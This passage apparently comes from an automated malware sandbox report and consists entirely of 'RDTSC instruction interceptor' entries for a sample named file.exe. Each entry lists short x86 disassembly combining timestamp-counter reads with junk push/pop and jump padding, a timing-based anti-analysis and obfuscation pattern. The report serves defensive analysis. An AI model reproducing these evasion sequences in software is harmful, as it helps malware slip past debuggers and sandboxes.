0x0000006c push edx 0x0000006d pushad 0x0000006e push ebx 0x0000006f pop ebx 0x00000070 push ecx 0x00000071 pop ecx 0x00000072 popad 0x00000073 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B516AF second address: B516B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4D1D4 second address: B4D1DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B52730 second address: B52735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B52735 second address: B5274A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FE784B99A26h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push ecx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B517EA second address: B517FC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007FE784D2BEB8h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B518AB second address: B518D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784B99A33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007FE784B99A34h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5293E second address: B5295D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE784D2BEC3h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5784B second address: B578A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 jg 00007FE784B99A30h 0x0000000d nop 0x0000000e pushad 0x0000000f movzx edi, di 0x00000012 mov dword ptr [ebp+122D2B82h], edx 0x00000018 popad 0x00000019 push 00000000h 0x0000001b pushad 0x0000001c adc eax, 1501A958h 0x00000022 popad 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ebx 0x00000028 call 00007FE784B99A28h 0x0000002d pop ebx 0x0000002e mov dword ptr [esp+04h], ebx 0x00000032 add dword ptr [esp+04h], 0000001Ch 0x0000003a inc ebx 0x0000003b push ebx 0x0000003c ret 0x0000003d pop ebx 0x0000003e ret 0x0000003f xchg eax, esi 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B578A4 second address: B578A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B578A8 second address: B578C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FE784B99A2Ch 0x0000000c popad 0x0000000d push eax 0x0000000e js 00007FE784B99A34h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5996E second address: B59972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B59972 second address: B59978 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B59978 second address: B59993 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE784D2BEC7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A8C7 second address: B5A8CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A8CD second address: B5A8D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A8D1 second address: B5A8F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE784B99A39h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A8F6 second address: B5A8FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A8FA second address: B5A904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B57A52 second address: B57AFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784D2BEBEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007FE784D2BEB8h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 push dword ptr fs:[00000000h] 0x0000002b mov bx, 465Fh 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 push 00000000h 0x00000038 push ebx 0x00000039 call 00007FE784D2BEB8h 0x0000003e pop ebx 0x0000003f mov dword ptr [esp+04h], ebx 0x00000043 add dword ptr [esp+04h], 0000001Ch 0x0000004b inc ebx 0x0000004c push ebx 0x0000004d ret 0x0000004e pop ebx 0x0000004f ret 0x00000050 mov eax, dword ptr [ebp+122D1075h] 0x00000056 push 00000000h 0x00000058 push ebx 0x00000059 call 00007FE784D2BEB8h 0x0000005e pop ebx 0x0000005f mov dword ptr [esp+04h], ebx 0x00000063 add dword ptr [esp+04h], 00000014h 0x0000006b inc ebx 0x0000006c push ebx 0x0000006d ret 0x0000006e pop ebx 0x0000006f ret 0x00000070 mov edi, dword ptr [ebp+122D2689h] 0x00000076 push FFFFFFFFh 0x00000078 mov bx, 0F05h 0x0000007c nop 0x0000007d push eax 0x0000007e push edx 0x0000007f jmp 00007FE784D2BEBBh 0x00000084 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5B83C second address: B5B851 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE784B99A31h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5B851 second address: B5B8BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FE784D2BEBAh 0x0000000e nop 0x0000000f jmp 00007FE784D2BEC5h 0x00000014 push 00000000h 0x00000016 sub dword ptr [ebp+122D1EA6h], ebx 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push esi 0x00000021 call 00007FE784D2BEB8h 0x00000026 pop esi 0x00000027 mov dword ptr [esp+04h], esi 0x0000002b add dword ptr [esp+04h], 00000014h 0x00000033 inc esi 0x00000034 push esi 0x00000035 ret 0x00000036 pop esi 0x00000037 ret 0x00000038 mov di, A1EAh 0x0000003c xchg eax, esi 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007FE784D2BEC8h 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B59B56 second address: B59B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5B8BF second address: B5B8EA instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE784D2BEBCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE784D2BEC8h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B59B5B second address: B59B61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5DA74 second address: B5DA78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5DA78 second address: B5DB18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784B99A30h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007FE784B99A28h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 mov bl, 14h 0x00000028 push 00000000h 0x0000002a mov edi, dword ptr [ebp+122D27DDh] 0x00000030 and di, AFC1h 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push edx 0x0000003a call 00007FE784B99A28h 0x0000003f pop edx 0x00000040 mov dword ptr [esp+04h], edx 0x00000044 add dword ptr [esp+04h], 0000001Dh 0x0000004c inc edx 0x0000004d push edx 0x0000004e ret 0x0000004f pop edx 0x00000050 ret 0x00000051 adc edi, 7AF9405Dh 0x00000057 xchg eax, esi 0x00000058 jmp 00007FE784B99A36h 0x0000005d push eax 0x0000005e pushad 0x0000005f jnl 00007FE784B99A28h 0x00000065 je 00007FE784B99A2Ch 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5DC7D second address: B5DC83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5DC83 second address: B5DC90 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5DC90 second address: B5DCAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE784D2BEC6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6112A second address: B6112F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6112F second address: B61151 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784D2BEC8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B66904 second address: B66908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B66908 second address: B66926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007FE784D2BEC4h 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B66926 second address: B66946 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784B99A2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jp 00007FE784B99A2Ch 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B66C13 second address: B66C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jns 00007FE784D2BEBEh 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007FE784D2BEB6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B66D3D second address: B66D43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B66D43 second address: B66D61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE784D2BEC4h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B66D61 second address: B66D79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784B99A2Eh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B66D79 second address: B66D7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6C642 second address: B6C648 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6C648 second address: B6C64E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6C64E second address: B6C652 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6DB18 second address: B6DB29 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE784D2BEB8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6DB29 second address: B6DB6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FE784B99A30h 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push esi 0x00000010 jg 00007FE784B99A2Ch 0x00000016 jl 00007FE784B99A26h 0x0000001c pop esi 0x0000001d mov eax, dword ptr [eax] 0x0000001f pushad 0x00000020 jmp 00007FE784B99A36h 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6DB6E second address: B6DB72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6DD79 second address: B6DD7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71989 second address: B719A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784D2BEC7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B719A4 second address: B719C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE784B99A37h 0x0000000d jl 00007FE784B99A26h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71F28 second address: B71F2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71F2C second address: B71F46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE784B99A30h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71F46 second address: B71F4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71F4C second address: B71F6F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE784B99A3Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71F6F second address: B71F73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B72254 second address: B7226C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784B99A32h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7226C second address: B72270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B723BF second address: B723C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B723C5 second address: B723E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007FE784D2BEBAh 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 je 00007FE784D2BEB6h 0x00000019 push esi 0x0000001a pop esi 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B726B9 second address: B726C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B72986 second address: B7299D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE784D2BEBCh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7299D second address: B729FF instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE784B99A26h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FE784B99A33h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jnc 00007FE784B99A26h 0x0000001b jmp 00007FE784B99A39h 0x00000020 jmp 00007FE784B99A33h 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 js 00007FE784B99A2Ah 0x0000002e push edi 0x0000002f pop edi 0x00000030 push eax 0x00000031 pop eax 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B729FF second address: B72A07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B72A07 second address: B72A1F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE784B99A2Eh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B72BB5 second address: B72BBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B72BBB second address: B72BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FE784B99A26h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B72BC6 second address: B72BEA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FE784D2BEC8h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7433C second address: B7435D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 jl 00007FE784B99A3Fh 0x0000000c jmp 00007FE784B99A33h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B79DB1 second address: B79DB7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B79109 second address: B7911E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE784B99A31h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7911E second address: B79170 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE784D2BEB6h 0x00000008 jmp 00007FE784D2BEC0h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FE784D2BEBBh 0x00000014 jng 00007FE784D2BEBCh 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jl 00007FE784D2BEBCh 0x00000023 jc 00007FE784D2BEB6h 0x00000029 jmp 00007FE784D2BEC2h 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B79170 second address: B79175 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B79175 second address: B7917E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B78745 second address: B7875D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE784B99A34h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7D7E7 second address: B7D7F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FE784D2BEBCh 0x0000000a jno 00007FE784D2BEB6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7D7F7 second address: B7D80B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE784B99A30h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B83421 second address: B83440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE784D2BEC4h 0x00000009 jo 00007FE784D2BEB6h 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B83440 second address: B83446 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B83446 second address: B8344A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8344A second address: B83473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE784B99A2Eh 0x00000010 jmp 00007FE784B99A30h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B81EE7 second address: B81EF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8218E second address: B821C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jp 00007FE784B99A26h 0x0000000d pop ecx 0x0000000e jmp 00007FE784B99A34h 0x00000013 jmp 00007FE784B99A32h 0x00000018 popad 0x00000019 push edi 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8261E second address: B8264A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FE784D2BEBFh 0x0000000a jmp 00007FE784D2BEBAh 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 jc 00007FE784D2BEC2h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8264A second address: B82650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B827B9 second address: B827BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B82948 second address: B82969 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pushad 0x0000000a push ebx 0x0000000b jmp 00007FE784B99A34h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
